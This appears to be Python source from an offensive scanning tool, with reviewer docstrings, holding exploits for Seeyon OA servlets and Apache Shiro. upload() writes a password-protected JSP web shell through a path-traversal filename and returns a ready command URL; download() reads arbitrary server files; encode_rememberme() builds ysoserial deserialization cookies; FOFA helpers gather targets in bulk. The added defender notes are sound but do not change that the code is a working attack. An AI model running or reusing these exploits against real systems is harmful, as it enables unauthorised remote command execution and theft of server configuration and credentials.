async def prove(self):
    '''
    Probe the target for the Seeyon ``htmlofficeservlet`` arbitrary-file-write.

    Flow (all visible below): resolve ``self.base_url``; GET
    ``seeyon/htmlofficeservlet`` and continue only if the body contains the
    ``DBSTEP V3.0`` banner; POST a DBSTEP-formatted body whose ``FILENAME``
    field is a ``..\\..\\..`` path into the ``seeyon`` webapp directory; then GET
    the written ``test<6 digits>.txt`` and look for the marker text.

    On success sets ``self.flag = 1`` and appends ``{"info": <url of test file>,
    "key": "seeyon getshell"}`` to ``self.res``. Returns ``None``.

    Defender view: the observable sequence is GET + POST to
    ``/seeyon/htmlofficeservlet`` (POST body starting ``DBSTEP V3.0``) followed
    by a GET for ``/seeyon/test######.txt``; a leftover ``test######.txt`` in the
    webapp root is an artifact of this probe. Restricting the servlet and
    applying the vendor fix removes the write primitive.

    NOTE(review): ``get_url``, ``base64encode``, ``ClientSession``, ``random``
    and ``asyncio`` come from outside this block. The POST response
    (``response2``) is never read, and the same name is reused for the
    follow-up GET. ``!= None`` is used where ``is not None`` is idiomatic;
    left unchanged here.
    '''
    await self.get_url()
    if self.base_url:
        # Custom 64-symbol alphabet handed to base64encode for the filename
        # field; presumably the servlet's own encoding table — confirm helper.
        table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
        # Random marker name so repeated probes do not collide (random is
        # fine here: the name is not a secret).
        test_file = 'test' + str(random.randint(100000, 999999)) + '.txt'
        # Path-traversal filename: three levels up, then into the webapp dir.
        base64_file = str(
            base64encode(
                '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
                    test_file), table))
        url = self.base_url + 'seeyon/htmlofficeservlet'
        async with ClientSession() as session:
            async with session.get(url=url) as response:
                if response != None:
                    text = await response.text()
                    # Only proceed when the servlet answers with its banner.
                    if 'DBSTEP V3.0' in text:
                        # DBSTEP body: the numeric header fields are kept
                        # verbatim; ``{}`` receives the encoded filename.
                        data = '''DBSTEP V3.0 355 0 22 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME={}\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66 \r\nthis is a test for me.f82abdd62cce9d2841a6efd5663e7bee'''.format(
                            base64_file)
                        async with session.post(url=url, data=data) as response2:
                            # Give the server a moment to flush the file
                            # before fetching it; the POST body is not read.
                            await asyncio.sleep(1)
                            url1 = self.base_url + 'seeyon/' + test_file
                            async with session.get(url=url1) as response2:
                                if response2 != None:
                                    text2 = await response2.text()
                                    # Marker text from the POST body served
                                    # back means the write landed.
                                    if 'this is a test for me' in text2:
                                        self.flag = 1
                                        self.res.append({
                                            "info": url1,
                                            "key": 'seeyon getshell'
                                        })
async def upload(self):
    '''
    Same ``htmlofficeservlet`` write as ``prove``, but the written file is a
    ``.jsp`` and the DBSTEP body carries a JSP page instead of marker text.

    Flow: resolve ``self.base_url``; GET ``seeyon/htmlofficeservlet`` and
    require the ``DBSTEP V3.0`` banner; POST the DBSTEP body with a
    ``..\\..\\..`` ``FILENAME`` pointing into the ``seeyon`` webapp; sleep one
    second; GET the new ``test<6 digits>.jsp`` and treat the page's default
    ``:-)`` output as confirmation.

    On success sets ``self.flag = 1`` and appends ``{"info": <jsp url with its
    query parameters>, "key": "seeyon getshell"}`` to ``self.res``.
    Returns ``None``.

    Defender view: indicators are the same servlet GET/POST pair as ``prove``
    followed by a GET for ``/seeyon/test######.jsp``; a JSP file with a
    ``test######`` name in the webapp root is a persistent artifact to remove.
    The page the body installs answers ``:-)`` to unauthenticated requests, so
    that response string is a cheap content signature.

    NOTE(review): the POST response is never read; ``!= None`` comparisons
    and the helper names (``get_url``, ``base64encode``, ``ClientSession``,
    ``random``, ``asyncio``) are unchanged from the original.
    '''
    await self.get_url()
    if self.base_url:
        # Same custom alphabet as ``prove`` — presumably the servlet's
        # encoding table; confirm against base64encode's signature.
        table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
        test_file = 'test' + str(random.randint(100000, 999999)) + '.jsp'
        # Path-traversal filename into the webapp directory.
        base64_file = str(
            base64encode(
                '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
                    test_file), table))
        url = self.base_url + 'seeyon/htmlofficeservlet'
        async with ClientSession() as session:
            async with session.get(url=url) as response:
                if response != None:
                    text = await response.text()
                    if 'DBSTEP V3.0' in text:
                        # DBSTEP body built by concatenation; the trailing
                        # hex token is part of the original body and is kept
                        # verbatim. Note the Java source keeps ``\\n`` as two
                        # characters because this is a Python literal.
                        data = '''DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=''' + base64_file + '''\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("test12345".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>c0a4500844f330626a5f11e1563b03f2'''
                        async with session.post(url=url, data=data) as response:
                            # Let the write settle before the verification GET.
                            await asyncio.sleep(1)
                            url1 = self.base_url + 'seeyon/' + test_file
                            async with session.get(url=url1) as response1:
                                if response1 != None:
                                    text1 = await response1.text()
                                    # ``:-)`` is the page's default output.
                                    if ':-)' in text1:
                                        self.flag = 1
                                        self.res.append({
                                            "info": url1 + '?pwd=test12345&cmd=whoami',
                                            "key": 'seeyon getshell'
                                        })
async def _fofa_api(search, page, flag = True):
    '''
    https://fofa.so/api#auth

    Async generator: page through the FOFA search API and yield the first
    column of every result row (``item[0]``).

    Args:
        search: query string; base64-encoded before being sent as ``qbase64``.
        page: number of result pages to request (1..page inclusive).
        flag: when true, emit a ``logger.sysinfo`` line before searching.

    Yields:
        ``item[0]`` for each row in ``results`` of each page.

    Exits:
        ``sys.exit`` when the ``fofa_api`` config section is missing or the
        API answers 401. Because ``logger.error`` is passed as the exit
        argument, the process exit status is whatever that call returns
        (presumably ``None`` → status 0) — confirm this is intended.

    NOTE(review): the email and API key are placed in the URL query string,
    so they will appear in proxy, server and debug logs; a header or POST
    body would keep them out of URL logs. ``conf``, ``logger``,
    ``base64encode`` and ``ClientSession`` come from outside this block.
    '''
    # Endpoint redacted in the published source.
    url_login = '******'
    try:
        # NOTE(review): the sync variant in this file reads
        # conf['config']['fofa_api'] — confirm which layout tentacle.conf uses.
        email = conf['fofa_api']['email']
        key = conf['fofa_api']['token']
    except KeyError:
        sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf."))
    if flag:
        logger.sysinfo("Using fofa api...")
    # NOTE(review): if base64encode returns bytes, str() yields the "b'...'"
    # repr rather than the base64 text; the sync variant decodes with
    # 'utf-8' instead — verify which return type the helper has.
    search = str(base64encode(search))
    async with ClientSession() as session:
        for p in range(1,page+1):
            logger.debug("Find fofa url of %d page..." % int(p))
            async with session.post(url=url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key,p, search)) as response:
                if response !=None:
                    if int(response.status) == 401:
                        sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
                    else:
                        res = await response.text()
                        if res !=None:
                            res_json = json.loads(res)
                            # A non-null "error" field silently skips the page.
                            if res_json["error"] is None:
                                # Empty page ends the whole paging loop.
                                # NOTE(review): a missing 'results' key makes
                                # len(None) raise TypeError — not guarded.
                                if len(res_json.get('results')) == 0:
                                    break
                                for item in res_json.get('results'):
                                    logger.debug("Fofa Found: %s" % item[0])
                                    yield item[0]
def _fofa_api(search, page, flag = True):
    '''
    https://fofa.so/api#auth

    Synchronous FOFA search: request pages ``1..page`` via ``mycurl`` and
    collect the first column (``item[0]``) of every result row.

    Args:
        search: query string; sent base64-encoded as ``qbase64``.
        page: number of result pages to fetch (inclusive upper bound).
        flag: when true, emit a ``logger.sysinfo`` line before searching.

    Returns:
        list of ``item[0]`` values across all fetched pages (may be empty).

    Exits:
        ``sys.exit`` when ``conf['config']['fofa_api']`` lacks ``email`` or
        ``token``, or when the API returns HTTP 401. The exit argument is the
        return value of ``logger.error`` (presumably ``None`` → status 0).

    NOTE(review): email and API key travel in the URL query string and so
    end up in proxy/server/debug logs. ``res.text`` is parsed without
    checking for an empty body, and a missing ``results`` key is not
    guarded. ``conf``, ``logger``, ``mycurl`` and ``base64encode`` come from
    outside this block.
    '''
    # Endpoint redacted in the published source.
    url_login = '******'
    try:
        email = conf['config']['fofa_api']['email']
        key = conf['config']['fofa_api']['token']
    except KeyError:
        sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf."))
    if flag:
        logger.sysinfo("Using fofa api...")
    # base64encode works on bytes here; decode back to text for the URL.
    qbase64 = str(base64encode(bytes(search, 'utf-8')), 'utf-8')
    found = []
    for page_no in range(1, page + 1):
        logger.debug("Find fofa url of %d page..." % page_no)
        query = '?email={0}&key={1}&page={2}&qbase64={3}'.format(
            email, key, page_no, qbase64)
        res = mycurl('post', url_login + query)
        if res == None:
            # Transport failure: skip this page, keep paging.
            continue
        if int(res.status_code) == 401:
            sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
        payload = json.loads(res.text)
        if payload["error"] is not None:
            # API-level error for this page: nothing to collect.
            continue
        for item in payload.get('results'):
            logger.debug("Fofa Found: %s" % item[0])
            found.append(item[0])
    return found
async def download(self):
    '''
    Probe the Seeyon ``officeservlet`` for a file read via the ``TEMPLATE``
    field of a DBSTEP body.

    Flow: resolve ``self.base_url``; GET ``seeyon/officeservlet`` and require
    the ``DBSTEP V3.0`` banner; POST a DBSTEP body whose ``TEMPLATE`` field is
    ``self.parameter['file']`` encoded with the custom ``table`` alphabet;
    treat a ``<res-type>javax.sql.DataSource</res-type>`` element in the
    reply as proof the requested file was returned.

    On success sets ``self.flag = 1`` and appends ``{"info": <servlet url>,
    "key": "seeyon download"}`` to ``self.res``. Returns ``None``.

    Defender view: indicators are a GET followed by a
    ``application/x-www-form-urlencoded`` POST to ``/seeyon/officeservlet``
    whose body begins ``DBSTEP V3.0``. The success check implies the
    caller's ``file`` parameter names a datasource/context configuration
    file, so an outbound response containing ``<res-type>`` from this
    servlet is a strong signal.

    NOTE(review): ``self.parameter['file']`` raises ``KeyError`` if absent;
    ``response`` is reused for both requests; ``!= None`` is kept from the
    original. ``get_url``, ``base64encode`` and ``ClientSession`` come from
    outside this block.
    '''
    await self.get_url()
    if self.base_url:
        # Caller-supplied path to read; no validation here.
        fn = self.parameter['file']
        # Custom alphabet for the servlet's field encoding — presumably the
        # same table base64encode expects; confirm helper signature.
        table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
        base64_file = str(base64encode(fn, table))
        url = self.base_url + 'seeyon/officeservlet'
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        async with ClientSession() as session:
            async with session.get(url=url) as response:
                if response != None:
                    text = await response.text()
                    if 'DBSTEP V3.0' in text:
                        # DBSTEP body; ``{}`` receives the encoded file path
                        # in the TEMPLATE field.
                        data = '''DBSTEP V3.0 331 0 0 \r\ncurrentUserId=ziCEz4eEz4KuzUK3ziKGwUdszg66\r\nRECORDID=wLKhwLK6\r\nCREATEDATE=wLShwUgsP4o3Pg66\r\noriginalFileId=wV66\r\nneedReadFile=NrMGyV66\r\noriginalCreateDate=wLShwUgsP4o3Pg66\r\nOPTION=LKDxOWOWLlxwVlOW\r\nCOMMAND=BSTLOlMSOCQwOV66\r\nTEMPLATE={}\r\naffairMemberId=wV66\r\naffairMemberName=OKlzLs66'''.format(
                            base64_file)
                        async with session.post(
                                url=url, data=data, headers=headers) as response:
                            if response != None:
                                text = await response.text()
                                # Presence of a DataSource element means the
                                # server returned the requested config file.
                                if '<res-type>javax.sql.DataSource</res-type>' in text:
                                    self.flag = 1
                                    self.res.append({
                                        "info": url,
                                        "key": 'seeyon download'
                                    })
def get_aes_cipher_cookie(self, text, key):
    '''
    Encrypt a base64 blob under a base64 key and wrap it as a cookie value.

    Layout of the produced value: ``"rememberMe=" + base64(iv || AES-CBC(
    PKCS#7-padded plaintext))`` with a fresh random 16-byte IV
    (``uuid.uuid4().bytes``). This is the IV-prefixed CBC layout used by
    rememberMe-style cookies; the value is only meaningful to a server that
    holds the same ``key``, so keeping that key secret and rotated is the
    mitigation on the receiving side.

    Args:
        text: base64-encoded plaintext (decoded with ``base64decode``).
        key: base64-encoded AES key (decoded with ``base64decode``).

    Returns:
        ``str`` starting with ``"rememberMe="``.

    NOTE(review): if ``base64encode`` returns bytes, ``str()`` yields the
    ``b'...'`` repr rather than plain base64 text — confirm the helper's
    return type. ``AES``, ``base64decode`` and ``base64encode`` come from
    outside this block.
    '''
    block = AES.block_size

    def pkcs7(raw):
        # Pad with N bytes of value N so the length is a block multiple.
        fill = block - len(raw) % block
        return raw + chr(fill).encode() * fill

    iv = uuid.uuid4().bytes
    cipher = AES.new(base64decode(key), AES.MODE_CBC, iv)
    ciphertext = cipher.encrypt(pkcs7(base64decode(text)))
    return "rememberMe=" + str(base64encode(iv + ciphertext))
def encode_rememberme(self, command, key):
    '''
    Build a ``rememberMe=`` cookie value whose plaintext is the stdout of an
    external ``ysoserial`` run.

    Runs ``java -jar tool/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient
    <command>`` (argument list, no shell, so ``command`` is a single argv
    entry), reads its stdout to EOF, PKCS#7-pads it, encrypts it with
    AES-CBC under ``base64decode(key)`` and a random 16-byte IV, and returns
    ``"rememberMe=" + str(base64encode(iv + ciphertext))``.

    Args:
        command: passed verbatim as the last argument to ysoserial.
        key: base64-encoded AES key.

    Returns:
        ``str`` cookie value.

    Raises:
        ``FileNotFoundError`` (from ``Popen``) if ``java`` is not on PATH;
        whatever ``AES.new`` raises for a wrong-length key.

    Defender view: the resulting cookie only matters to a server using the
    same key; a rememberMe value that fails to decrypt or deserialize is the
    server-side signal to log and alert on.

    NOTE(review): the child process is never waited on or its pipe closed
    (no ``wait``/``communicate``/context manager), so it is left to the GC;
    the padding/IV/encrypt code duplicates ``get_aes_cipher_cookie`` and the
    same ``str()``-of-bytes caveat applies to the return value.
    ``subprocess``, ``AES``, ``uuid``, ``base64decode`` and ``base64encode``
    come from outside this block.
    '''
    popen = subprocess.Popen([
        'java', '-jar', 'tool/ysoserial-0.0.6-SNAPSHOT-all.jar',
        'JRMPClient', command
    ], stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7: append N bytes of value N up to the next block boundary.
    pad = lambda s: s + (
        (BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    mode = AES.MODE_CBC
    # Fresh random IV per call; it is prepended to the ciphertext below.
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64decode(key), mode, iv)
    # Reads the child's stdout to EOF; the process itself is not reaped.
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64encode(iv + encryptor.encrypt(file_body))
    return "rememberMe=" + str(base64_ciphertext)